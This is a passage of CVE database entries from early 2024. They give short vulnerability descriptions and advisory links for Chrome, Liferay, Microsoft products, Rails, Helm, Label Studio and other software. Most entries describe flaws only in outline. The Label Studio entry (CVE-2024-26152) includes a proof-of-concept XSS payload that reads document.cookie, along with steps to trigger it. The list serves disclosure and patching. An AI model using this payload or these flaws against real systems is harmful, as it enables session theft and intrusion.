CVE 2024 2627 Candidate Use after free in Canvas in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/41493290 | URL:https://issues.chromium.org/issues/41493290 Assigned (20240319)
CVE 2024 26269 Candidate Cross-site scripting (XSS) vulnerability in the Frontend JS module's portlet.js in Liferay Portal 7.2.0 through 7.4.3.37, and Liferay DXP 7.4 before update 38, 7.3 before update 11, 7.2 before fix pack 20, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via the anchor (hash) part of a URL. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26269 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26269 Assigned (20240215)
CVE 2024 26268 Candidate User enumeration vulnerability in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 8, 7.2 before fix pack 20, and older unsupported versions allows remote attackers to determine if an account exist in the application by comparing the request's response time. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26268 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26268 Assigned (20240215)
CVE 2024 26267 Candidate In Liferay Portal 7.2.0 through 7.4.3.25, and older unsupported versions, and Liferay DXP 7.4 before update 26, 7.3 before update 5, 7.2 before fix pack 19, and older unsupported versions the default value of the portal property `http.header.version.verbosity` is set to `full`, which allows remote attackers to easily identify the version of the application that is running and the vulnerabilities that affect that version via 'Liferay-Portal` response header. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26267 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26267 Assigned (20240215)
CVE 2024 26266 Candidate Multiple stored cross-site scripting (XSS) vulnerabilities in Liferay Portal 7.2.0 through 7.4.3.13, and older unsupported versions, and Liferay DXP 7.4 before update 10, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allow remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the first/middle/last name text field of the user who creates an entry in the (1) Announcement widget, or (2) Alerts widget. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26266 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26266 Assigned (20240215)
CVE 2024 26265 Candidate The Image Uploader module in Liferay Portal 7.2.0 through 7.4.3.15, and older unsupported versions, and Liferay DXP 7.4 before update 16, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions relies on a request parameter to limit the size of files that can be uploaded, which allows remote authenticated users to upload arbitrarily large files to the system's temp folder by modifying the `maxFileSize` parameter. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26265 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-26265 Assigned (20240215)
CVE 2024 26264 Candidate EBM Technologies RISWEB's specific query function parameter does not properly restrict user input, and this feature page is accessible without login. This allows remote attackers to inject SQL commands without authentication, enabling them to read, modify, and delete database records. MISC:https://www.twcert.org.tw/tw/cp-132-7677-b1c0f-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7677-b1c0f-1.html Assigned (20240215)
CVE 2024 26263 Candidate EBM Technologies RISWEB's specific URL path is not properly controlled by permission, allowing attackers to browse specific pages and query sensitive data without login. MISC:https://www.twcert.org.tw/tw/cp-132-7676-9418d-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7676-9418d-1.html Assigned (20240215)
CVE 2024 26262 Candidate EBM Technologies Uniweb/SoliPACS WebServer's query functionality lacks proper restrictions of user input, allowing remote attackers authenticated as regular user to inject SQL commands for reading, modifying, and deleting database records, as well as executing system commands. Attackers may even leverage the dbo privilege in the database for privilege escalation, elevating their privileges to administrator . MISC:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html Assigned (20240215)
CVE 2024 26261 Candidate The functionality for file download in HGiga OAKlouds' certain modules contains an Arbitrary File Read and Delete vulnerability. Attackers can put file path in specific request parameters, allowing them to download the file without login. Furthermore, the file will be deleted after being downloaded. MISC:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7674-bdb40-1.html Assigned (20240215)
CVE 2024 26260 Candidate The functionality for synchronization in HGiga OAKlouds' certain moudules has an OS Command Injection vulnerability, allowing remote attackers to inject system commands within specific request parameters. This enables the execution of arbitrary code on the remote server without permission. MISC:https://www.twcert.org.tw/tw/cp-132-7673-688b7-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7673-688b7-1.html Assigned (20240215)
CVE 2024 2626 Candidate Out of bounds read in Swiftshader in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/40945098 | URL:https://issues.chromium.org/issues/40945098 Assigned (20240319)
CVE 2024 2625 Candidate Object lifecycle issue in V8 in Google Chrome prior to 123.0.6312.58 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) FEDORA:FEDORA-2024-01f4c93547 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AQVVW4FLQDIJ2UABGXK2SMS5AUGT54FM/ | FEDORA:FEDORA-2024-ec79868e3b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2D3Z6CRRN4J3IUZPJZVURGMRBN6WFPTU/ | FEDORA:FEDORA-2024-f9eb1130c8 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6JINDYFB3MPH43ECTI72BV63K4RXSG22/ | MISC:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | URL:https://chromereleases.googleblog.com/2024/03/stable-channel-update-for-desktop_19.html | MISC:https://issues.chromium.org/issues/327740539 | URL:https://issues.chromium.org/issues/327740539 Assigned (20240319)
CVE 2024 26247 Candidate Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability MISC:Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26247 Assigned (20240215)
CVE 2024 2622 Candidate A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318. It has been classified as critical. This affects an unknown part of the file /api/client/editemedia.php. The manipulation of the argument number/enterprise_uuid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257199. MISC:VDB-257199 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257199 | MISC:VDB-257199 | Fujian Kelixin Communication Command and Dispatch Platform editemedia.php sql injection | URL:https://vuldb.com/?id.257199 | MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-editemedia.pdf | URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-editemedia.pdf Assigned (20240318)
CVE 2024 2621 Candidate A vulnerability was found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this issue is some unknown functionality of the file api/client/user/pwd_update.php. The manipulation of the argument uuid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257198 is the identifier assigned to this vulnerability. MISC:VDB-257198 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257198 | MISC:VDB-257198 | Fujian Kelixin Communication Command and Dispatch Platform pwd_update.php sql injection | URL:https://vuldb.com/?id.257198 | MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf | URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-pwd_update.php.pdf Assigned (20240318)
CVE 2024 26204 Candidate Outlook for Android Information Disclosure Vulnerability MISC:Outlook for Android Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26204 Assigned (20240214)
CVE 2024 26203 Candidate Azure Data Studio Elevation of Privilege Vulnerability MISC:Azure Data Studio Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26203 Assigned (20240214)
CVE 2024 26201 Candidate Microsoft Intune Linux Agent Elevation of Privilege Vulnerability MISC:Microsoft Intune Linux Agent Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26201 Assigned (20240214)
CVE 2024 2620 Candidate A vulnerability has been found in Fujian Kelixin Communication Command and Dispatch Platform up to 20240318 and classified as critical. Affected by this vulnerability is an unknown functionality of the file api/client/down_file.php. The manipulation of the argument uuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257197 was assigned to this vulnerability. MISC:VDB-257197 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257197 | MISC:VDB-257197 | Fujian Kelixin Communication Command and Dispatch Platform down_file.php sql injection | URL:https://vuldb.com/?id.257197 | MISC:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-down_file.pdf | URL:https://h0e4a0r1t.github.io/2024/vulns/Fujian%20Kelixin%20Communication%20Co.,%20Ltd.%20Command%20and%20Dispatch%20Platform%20SQL%20Injection%20Vulnerability-down_file.pdf Assigned (20240318)
CVE 2024 26199 Candidate Microsoft Office Elevation of Privilege Vulnerability MISC:Microsoft Office Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26199 Assigned (20240214)
CVE 2024 26198 Candidate Microsoft Exchange Server Remote Code Execution Vulnerability MISC:Microsoft Exchange Server Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26198 Assigned (20240214)
CVE 2024 26197 Candidate Windows Standards-Based Storage Management Service Denial of Service Vulnerability MISC:Windows Standards-Based Storage Management Service Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26197 Assigned (20240214)
CVE 2024 26196 Candidate Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability MISC:Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26196 Assigned (20240214)
CVE 2024 26192 Candidate Microsoft Edge (Chromium-based) Information Disclosure Vulnerability MISC:Microsoft Edge (Chromium-based) Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26192 Assigned (20240214)
CVE 2024 26190 Candidate Microsoft QUIC Denial of Service Vulnerability MISC:Microsoft QUIC Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26190 Assigned (20240214)
CVE 2024 26185 Candidate Windows Compressed Folder Tampering Vulnerability MISC:Windows Compressed Folder Tampering Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26185 Assigned (20240214)
CVE 2024 26182 Candidate Windows Kernel Elevation of Privilege Vulnerability MISC:Windows Kernel Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26182 Assigned (20240214)
CVE 2024 26181 Candidate Windows Kernel Denial of Service Vulnerability MISC:Windows Kernel Denial of Service Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26181 Assigned (20240214)
CVE 2024 26177 Candidate Windows Kernel Information Disclosure Vulnerability MISC:Windows Kernel Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26177 Assigned (20240214)
CVE 2024 26170 Candidate Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability MISC:Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26170 Assigned (20240214)
CVE 2024 26169 Candidate Windows Error Reporting Service Elevation of Privilege Vulnerability MISC:Windows Error Reporting Service Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26169 Assigned (20240214)
CVE 2024 26167 Candidate Microsoft Edge for Android Spoofing Vulnerability MISC:Microsoft Edge for Android Spoofing Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26167 Assigned (20240214)
CVE 2024 26166 Candidate Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability MISC:Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26166 Assigned (20240214)
CVE 2024 26165 Candidate Visual Studio Code Elevation of Privilege Vulnerability MISC:Visual Studio Code Elevation of Privilege Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26165 Assigned (20240214)
CVE 2024 26164 Candidate Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability MISC:Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26164 Assigned (20240214)
CVE 2024 26162 Candidate Microsoft ODBC Driver Remote Code Execution Vulnerability MISC:Microsoft ODBC Driver Remote Code Execution Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26162 Assigned (20240214)
CVE 2024 26160 Candidate Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability MISC:Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability | URL:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26160 Assigned (20240214)
CVE 2024 2616 Candidate To harden ICU against exploitation, the behavior for out-of-memory conditions was changed to crash instead of attempt to continue. This vulnerability affects Firefox ESR < 115.9 and Thunderbird < 115.9. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1846197 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1846197 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-13/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-13/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-14/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-14/ | MLIST:[debian-lts-announce] 20240323 [SECURITY] [DLA 3769-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00022.html | MLIST:[debian-lts-announce] 20240325 [SECURITY] [DLA 3775-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00028.html Assigned (20240318)
CVE 2024 26152 Candidate ### Summary On all Label Studio versions prior to 1.11.0, data imported via file upload feature is not properly sanitized prior to being rendered within a [`Choices`](https://labelstud.io/tags/choices) or [`Labels`](https://labelstud.io/tags/labels) tag, resulting in an XSS vulnerability. ### Details Need permission to use the "data import" function. This was reproduced on Label Studio 1.10.1. ### PoC 1. Create a project.  2. Upload a file containing the payload using the "Upload Files" function.   The following are the contents of the files used in the PoC ``` { "data": { "prompt": "labelstudio universe image", "images": [ { "value": "id123#0", "style": "margin: 5px", "html": "<img width='400' src='https://labelstud.io/_astro/images-tab.64279c16_ZaBSvC.avif' onload=alert(document.cookie)>" } ] } } ``` 3. Select the text-to-image generation labeling template of Ranking and scoring   4. Select a task  5. Check that the script is running  ### Impact Malicious scripts can be injected into the code, and when linked with vulnerabilities such as CSRF, it can cause even greater damage. In particular, It can become a source of further attacks, especially when linked to social engineering. MISC:https://github.com/HumanSignal/label-studio/commit/5df9ae3828b98652e9fa290a19f4deedf51ef6c8 | URL:https://github.com/HumanSignal/label-studio/commit/5df9ae3828b98652e9fa290a19f4deedf51ef6c8 | MISC:https://github.com/HumanSignal/label-studio/pull/5232 | URL:https://github.com/HumanSignal/label-studio/pull/5232 | MISC:https://github.com/HumanSignal/label-studio/releases/tag/1.11.0 | URL:https://github.com/HumanSignal/label-studio/releases/tag/1.11.0 | MISC:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6xv9-957j-qfhg | URL:https://github.com/HumanSignal/label-studio/security/advisories/GHSA-6xv9-957j-qfhg Assigned (20240214)
CVE 2024 26151 Candidate The `mjml` PyPI package, found at the `FelixSchwarz/mjml-python` GitHub repo, is an unofficial Python port of MJML, a markup language created by Mailjet. All users of `FelixSchwarz/mjml-python` who insert untrusted data into mjml templates unless that data is checked in a very strict manner. User input like `<script>` would be rendered as `<script>` in the final HTML output. The attacker must be able to control some data which is later injected in an mjml template which is then send out as email to other users. The attacker could control contents of email messages sent through the platform. The problem has been fixed in version 0.11.0 of this library. Versions before 0.10.0 are not affected by this security issue. As a workaround, ensure that potentially untrusted user input does not contain any sequences which could be rendered as HTML. MISC:https://github.com/FelixSchwarz/mjml-python/commit/84c495da20a91640a1ca551ace17df7f3be644aa | URL:https://github.com/FelixSchwarz/mjml-python/commit/84c495da20a91640a1ca551ace17df7f3be644aa | MISC:https://github.com/FelixSchwarz/mjml-python/commit/8d410b7a500703080bb14ed7e3d2663fe16767e6 | URL:https://github.com/FelixSchwarz/mjml-python/commit/8d410b7a500703080bb14ed7e3d2663fe16767e6 | MISC:https://github.com/FelixSchwarz/mjml-python/issues/52 | URL:https://github.com/FelixSchwarz/mjml-python/issues/52 | MISC:https://github.com/FelixSchwarz/mjml-python/releases/tag/v0.11.0 | URL:https://github.com/FelixSchwarz/mjml-python/releases/tag/v0.11.0 | MISC:https://github.com/FelixSchwarz/mjml-python/security/advisories/GHSA-578p-fxmm-6229 | URL:https://github.com/FelixSchwarz/mjml-python/security/advisories/GHSA-578p-fxmm-6229 Assigned (20240214)
CVE 2024 26150 Candidate `@backstage/backend-common` is a common functionality library for backends for Backstage, an open platform for building developer portals. In `@backstage/backend-common` prior to versions 0.21.1, 0.20.2, and 0.19.10, paths checks with the `resolveSafeChildPath` utility were not exhaustive enough, leading to risk of path traversal vulnerabilities if symlinks can be injected by attackers. This issue is patched in `@backstage/backend-common` versions 0.21.1, 0.20.2, and 0.19.10. MISC:https://github.com/backstage/backstage/commit/1ad2b1b61ebb430051f7d804b0cc7ebfe7922b6f | URL:https://github.com/backstage/backstage/commit/1ad2b1b61ebb430051f7d804b0cc7ebfe7922b6f | MISC:https://github.com/backstage/backstage/commit/78f892b3a84d63de2ba167928f171154c447b717 | URL:https://github.com/backstage/backstage/commit/78f892b3a84d63de2ba167928f171154c447b717 | MISC:https://github.com/backstage/backstage/commit/edf65d7d31e027599c2415f597d085ee84807871 | URL:https://github.com/backstage/backstage/commit/edf65d7d31e027599c2415f597d085ee84807871 | MISC:https://github.com/backstage/backstage/security/advisories/GHSA-2fc9-xpp8-2g9h | URL:https://github.com/backstage/backstage/security/advisories/GHSA-2fc9-xpp8-2g9h Assigned (20240214)
CVE 2024 2615 Candidate Memory safety bugs present in Firefox 123. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 124. MISC:Memory safety bugs fixed in Firefox 124 | URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1881074%2C1882438%2C1881650 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-12/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-12/ Assigned (20240318)
CVE 2024 26149 Candidate Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. If an excessively large value is specified as the starting index for an array in `_abi_decode`, it can cause the read position to overflow. This results in the decoding of values outside the intended array bounds, potentially leading to exploitations in contracts that use arrays within `_abi_decode`. This vulnerability affects 0.3.10 and earlier versions. MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-9p8r-4xp4-gw5w | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-9p8r-4xp4-gw5w Assigned (20240214)
CVE 2024 26148 Candidate Querybook is a user interface for querying big data. Prior to version 3.31.1, there is a vulnerability in Querybook's rich text editor that enables users to input arbitrary URLs without undergoing necessary validation. This particular security flaw allows the use of `javascript:` protocol which can potentially trigger arbitrary client-side execution. The most extreme exploit of this flaw could occur when an admin user unknowingly clicks on a cross-site scripting URL, thereby unintentionally compromising admin role access to the attacker. A patch to rectify this issue has been introduced in Querybook version `3.31.1`. The fix is backward compatible and automatically fixes existing DataDocs. There are no known workarounds for this issue, except for manually checking each URL prior to clicking on them. MISC:https://github.com/pinterest/querybook/commit/bc620dabaaf13ff1dcb30af0b46a490403fb9908 | URL:https://github.com/pinterest/querybook/commit/bc620dabaaf13ff1dcb30af0b46a490403fb9908 | MISC:https://github.com/pinterest/querybook/pull/1412 | URL:https://github.com/pinterest/querybook/pull/1412 | MISC:https://github.com/pinterest/querybook/security/advisories/GHSA-fh6g-gvvp-587f | URL:https://github.com/pinterest/querybook/security/advisories/GHSA-fh6g-gvvp-587f Assigned (20240214)
CVE 2024 26147 Candidate Helm is a package manager for Charts for Kubernetes. Versions prior to 3.14.2 contain an uninitialized variable vulnerability when Helm parses index and plugin yaml files missing expected content. When either an `index.yaml` file or a plugins `plugin.yaml` file were missing all metadata a panic would occur in Helm. In the Helm SDK, this is found when using the `LoadIndexFile` or `DownloadIndexFile` functions in the `repo` package or the `LoadDir` function in the `plugin` package. For the Helm client this impacts functions around adding a repository and all Helm functions if a malicious plugin is added as Helm inspects all known plugins on each invocation. This issue has been resolved in Helm v3.14.2. If a malicious plugin has been added which is causing all Helm client commands to panic, the malicious plugin can be manually removed from the filesystem. If using Helm SDK versions prior to 3.14.2, calls to affected functions can use `recover` to catch the panic. MISC:https://github.com/helm/helm/commit/bb4cc9125503a923afb7988f3eb478722a8580af | URL:https://github.com/helm/helm/commit/bb4cc9125503a923afb7988f3eb478722a8580af | MISC:https://github.com/helm/helm/security/advisories/GHSA-r53h-jv2g-vpx6 | URL:https://github.com/helm/helm/security/advisories/GHSA-r53h-jv2g-vpx6 Assigned (20240214)
CVE 2024 26146 Candidate Rack is a modular Ruby web server interface. Carefully crafted headers can cause header parsing in Rack to take longer than expected resulting in a possible denial of service issue. Accept and Forwarded headers are impacted. Ruby 3.2 has mitigations for this problem, so Rack applications using Ruby 3.2 or newer are unaffected. This vulnerability is fixed in 2.0.9.4, 2.1.4.4, 2.2.8.1, and 3.0.9.1. MISC:https://discuss.rubyonrails.org/t/possible-denial-of-service-vulnerability-in-rack-header-parsing/84942 | URL:https://discuss.rubyonrails.org/t/possible-denial-of-service-vulnerability-in-rack-header-parsing/84942 | MISC:https://github.com/rack/rack/commit/30b8e39a578b25d4bdcc082c1c52c6f164b59716 | URL:https://github.com/rack/rack/commit/30b8e39a578b25d4bdcc082c1c52c6f164b59716 | MISC:https://github.com/rack/rack/commit/6c5d90bdcec0949f7ba06db62fb740dab394b582 | URL:https://github.com/rack/rack/commit/6c5d90bdcec0949f7ba06db62fb740dab394b582 | MISC:https://github.com/rack/rack/commit/a227cd793778c7c3a827d32808058571569cda6f | URL:https://github.com/rack/rack/commit/a227cd793778c7c3a827d32808058571569cda6f | MISC:https://github.com/rack/rack/commit/e4c117749ba24a66f8ec5a08eddf68deeb425ccd | URL:https://github.com/rack/rack/commit/e4c117749ba24a66f8ec5a08eddf68deeb425ccd | MISC:https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f | URL:https://github.com/rack/rack/security/advisories/GHSA-54rr-7fvw-6x8f | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26146.yml | URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-26146.yml Assigned (20240214)
CVE 2024 26145 Candidate Discourse Calendar adds the ability to create a dynamic calendar in the first post of a topic on Discourse. Uninvited users are able to gain access to private events by crafting a request to update their attendance. This problem is resolved in commit dfc4fa15f340189f177a1d1ab2cc94ffed3c1190. As a workaround, one may use post visibility to limit access. MISC:https://github.com/discourse/discourse-calendar/commit/dfc4fa15f340189f177a1d1ab2cc94ffed3c1190 | URL:https://github.com/discourse/discourse-calendar/commit/dfc4fa15f340189f177a1d1ab2cc94ffed3c1190 | MISC:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-4hh7-6m34-p2jp | URL:https://github.com/discourse/discourse-calendar/security/advisories/GHSA-4hh7-6m34-p2jp Assigned (20240214)
CVE 2024 26144 Candidate Rails is a web-application framework. Starting with version 5.2.0, there is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a Set-Cookie header along with the user's session cookie when serving blobs. It also sets Cache-Control to public. Certain proxies may cache the Set-Cookie, leading to an information leak. The vulnerability is fixed in 7.0.8.1 and 6.1.7.7. MISC:https://discuss.rubyonrails.org/t/possible-sensitive-session-information-leak-in-active-storage/84945 | URL:https://discuss.rubyonrails.org/t/possible-sensitive-session-information-leak-in-active-storage/84945 | MISC:https://github.com/rails/rails/commit/723f54566023e91060a67b03353e7c03e7436433 | URL:https://github.com/rails/rails/commit/723f54566023e91060a67b03353e7c03e7436433 | MISC:https://github.com/rails/rails/commit/78fe149509fac5b05e54187aaaef216fbb5fd0d3 | URL:https://github.com/rails/rails/commit/78fe149509fac5b05e54187aaaef216fbb5fd0d3 | MISC:https://github.com/rails/rails/security/advisories/GHSA-8h22-8cf7-hq6g | URL:https://github.com/rails/rails/security/advisories/GHSA-8h22-8cf7-hq6g | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2024-26144.yml | URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2024-26144.yml Assigned (20240214)
CVE 2024 26143 Candidate Rails is a web-application framework. There is a possible XSS vulnerability when using the translation helpers in Action Controller. Applications using translation methods like translate, or t on a controller, with a key ending in "_html", a :default key which contains untrusted user input, and the resulting string is used in a view, may be susceptible to an XSS vulnerability. The vulnerability is fixed in 7.1.3.1 and 7.0.8.1. MISC:https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947 | URL:https://discuss.rubyonrails.org/t/possible-xss-vulnerability-in-action-controller/84947 | MISC:https://github.com/rails/rails/commit/4c83b331092a79d58e4adffe4be5f250fa5782cc | URL:https://github.com/rails/rails/commit/4c83b331092a79d58e4adffe4be5f250fa5782cc | MISC:https://github.com/rails/rails/commit/5187a9ef51980ad1b8e81945ebe0462d28f84f9e | URL:https://github.com/rails/rails/commit/5187a9ef51980ad1b8e81945ebe0462d28f84f9e | MISC:https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4 | URL:https://github.com/rails/rails/security/advisories/GHSA-9822-6m93-xqf4 | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26143.yml | URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26143.yml Assigned (20240214)
CVE 2024 26142 Candidate Rails is a web-application framework. Starting in version 7.1.0, there is a possible ReDoS vulnerability in the Accept header parsing routines of Action Dispatch. This vulnerability is patched in 7.1.3.1. Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected. MISC:https://discuss.rubyonrails.org/t/possible-redos-vulnerability-in-accept-header-parsing-in-action-dispatch/84946 | URL:https://discuss.rubyonrails.org/t/possible-redos-vulnerability-in-accept-header-parsing-in-action-dispatch/84946 | MISC:https://github.com/rails/rails/commit/b4d3bfb5ed8a5b5a90aad3a3b28860c7a931e272 | URL:https://github.com/rails/rails/commit/b4d3bfb5ed8a5b5a90aad3a3b28860c7a931e272 | MISC:https://github.com/rails/rails/security/advisories/GHSA-jjhx-jhvp-74wq | URL:https://github.com/rails/rails/security/advisories/GHSA-jjhx-jhvp-74wq | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2024-26142.yml | 